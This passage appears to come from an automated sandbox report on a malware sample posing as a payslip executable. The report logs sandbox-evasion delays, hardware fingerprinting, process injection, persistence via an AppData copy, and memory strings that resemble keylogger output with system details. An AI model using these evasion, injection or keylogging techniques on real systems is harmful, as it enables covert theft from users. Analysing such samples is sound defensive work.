                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -596250s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -596140s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -596025s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -595922s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -595812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -595703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -595593s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -595484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -595375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -595265s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -595156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -595046s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -594936s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -594828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -594718s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344Thread sleep time: -594609s >= -30000s
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599511Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599369Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599263Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599151Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598991Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598815Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598468Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598357Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598250Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598116Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597794Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596373Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596153Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596004Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595875Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595760Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595656Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595547Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595327Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595218Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595108Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594999Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594781Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594671Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594344Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594234Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597749Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597529Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596233Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595522Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595136Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595025Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594248Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599672
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599094
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598984
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598762
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598218
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597672
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597343
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596797
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596687
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596578
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596358
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596025
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595922
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595265
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595156
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595046
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594936
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594718
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594609
                    Source: sgxIb.exe, 00000008.00000002.4121600750.00000000010C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                    Source: Payslip_October_2024.exe, 00000002.00000002.4121114729.0000000000D3D000.00000004.00000020.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1887034181.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory written: C:\Users\user\Desktop\Payslip_October_2024.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess created: C:\Users\user\Desktop\Payslip_October_2024.exe "C:\Users\user\Desktop\Payslip_October_2024.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3<b>[ Program Manager]</b> (05/11/2024 05:57:33)<br>
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q9<b>[ Program Manager]</b> (05/11/2024 05:57:33)<br>{Win}rTHcq
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002D0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <html>Time: 11/18/2024 19:04:53<br>User Name: user<br>Computer Name: 724536<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 173.254.250.69<br><hr><b>[ Program Manager]</b> (05/11/2024 05:57:33)<br>{Win}r</html>
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q8<b>[ Program Manager]</b> (05/11/2024 05:57:33)<br>{Win}THcq
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Users\user\Desktop\Payslip_October_2024.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
